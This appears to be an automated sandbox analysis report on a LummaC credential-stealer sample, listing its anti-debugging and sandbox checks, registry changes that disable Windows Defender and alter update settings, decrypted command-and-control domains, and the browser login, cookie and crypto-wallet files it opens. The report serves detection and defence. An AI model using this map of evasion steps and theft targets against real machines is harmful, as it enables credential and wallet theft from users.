Source: file.exe, 00000000.00000003.2211191046.0000000005205000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: aLJcsjdjnhQbDyaoUAa+FMRwoWhJBvMnzeLkMaVCYG1NaWHN/aSrkxVjgiuRb9tsS8Q4WhQcbkim7iMoyOZgJl5OYrQOnOTSVgGNwOB/E3uIC6RH4THKNpfamWGBHPLBt6Lhm3xM34g7ygXlCorNUKYPh8ZZ5braau967FwbeO5o1pHIsdubrKoaNNYEeMvcDymdblm2CC0Q5VXMkOQgYohlMadka/PhNe/MD3YKpEXhNQ4LhdYiADEA6OJjsMUXFJKIDUh4dyJpiEbehY8xIhAvThNKKRcv0Q3mFBaMYnhF4fO1h6ZMFsw1XStckRVu+LYDkoBAWriOp3mrhmjo9a+gZHWRMVWxqhmGkwPDYyjKMCw0Og3WVeEka+xsvn29TtmTfWbTJ0IYJkyXVZTogEvk0Ug/cTvdVBjxCPm0bNBY/sA3VxFhkhdzQsFcLBz6uGXB1DV0nbobJw9jhNYa0gG/En+48ZFhmCFIXmuZoqiopbM5c3YRODtzXlizVX/mAitADqNeW5oaJtWpjpinGWLCK8urG3jKNN0mmupGvcU5HlXybvdFUXWgqEhdpkMfvjkkaEbCSfMYSxkL4HWyoXAB1G5hDlqeMuUnwoUAFmVChtHrzZUujZ1qMtmQuVsgyJgRjoLosLTOWYnCQQNUD+mHRChOMZhQemhTYAQZgYPXrgAlY7arGVNjsQrU1hANJXXgrvFAvKP9iwWKe4wjrnFHs+Z6nrkdzDfsQ7pfwBivJDdeBjyC8ZBrYMHeatMrX4SJ1l2vEDg/GZZwN3qvaQEOk1nsYI0nQhADMY/hZsIxYmq3ilFF3yHgGzY6tEzFmBea/UBzFhAmYb1oqHrA2HYnHoIDc0qDg5jN/iSm+UGwHYbQqqkRJVpdhCsWfEsDQs2YatlmgMvGsygRH9PIZM241n1Wg2QJriGdD15v8AEBGUz5wmlUAhSdeuRka5XGneIZTmGpDHsAMQJpeyqP8xYFGCRUAjTnqs8pnAw7ZfJaRM+v+EFLwrtaPnqkMBbgxavDBYWANPixOUg4B+VzjJUjJYCBsUJclzNAchyM4pexDM02OhsoxyzrVD0C6Ars
Source: file.exe, 00000000.00000003.2211856887.000000000525D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: file.exe, 00000000.00000003.2211856887.000000000525D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Thread information set: HideFromDebugger			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe

Code function: 4_2_00FAF0F0 rdtsc

4_2_00FAF0F0

Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe

Code function: 4_2_00E3B786 LdrInitializeThunk,

4_2_00E3B786

Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: file.exe, 00000000.00000002.2358249173.0000000000731000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: scriptyprefej.store
Source: file.exe, 00000000.00000002.2358249173.0000000000731000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: navygenerayk.store
Source: file.exe, 00000000.00000002.2358249173.0000000000731000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: founpiuer.store
Source: file.exe, 00000000.00000002.2358249173.0000000000731000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: necklacedmny.store
Source: file.exe, 00000000.00000002.2358249173.0000000000731000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: thumbystriw.store
Source: file.exe, 00000000.00000002.2358249173.0000000000731000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: fadehairucw.store
Source: file.exe, 00000000.00000002.2358249173.0000000000731000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: crisiwarny.store
Source: file.exe, 00000000.00000002.2358249173.0000000000731000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: presticitpo.store

Source: ZXCELRXK9FXBC48TJDYH4AM8OTM.exe, ZXCELRXK9FXBC48TJDYH4AM8OTM.exe, 00000004.00000002.2500021434.0000000001002000.00000040.00000001.01000000.00000006.sdmp	Binary or memory string: *Program Manager
Source: file.exe, 00000000.00000002.2359597253.0000000000958000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: $#Program Manager

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender notifications (registry)

Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Jump to behavior

Disable Windows Defender real time protection (registry)

Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableIOAVProtection 1	Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRealtimeMonitoring 1	Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	Registry value created: DisableNotifications 1	Jump to behavior

Disables Windows Defender Tamper protection

Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe

Registry value created: TamperProtection 0

Jump to behavior

Modifies windows update settings

Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations	Jump to behavior

Source: file.exe, 00000000.00000003.2266181877.00000000052AD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2277373458.00000000052AD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2266264168.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2369340160.00000000052AD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2356335254.00000000052AC000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: file.exe PID: 2748, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: %appdata%\Electrum\wallets
Source: file.exe	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets
Source: file.exe	String found in binary or memory: Jaxx Liberty
Source: file.exe	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: file.exe	String found in binary or memory: ExodusWeb3
Source: file.exe	String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: file.exe	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
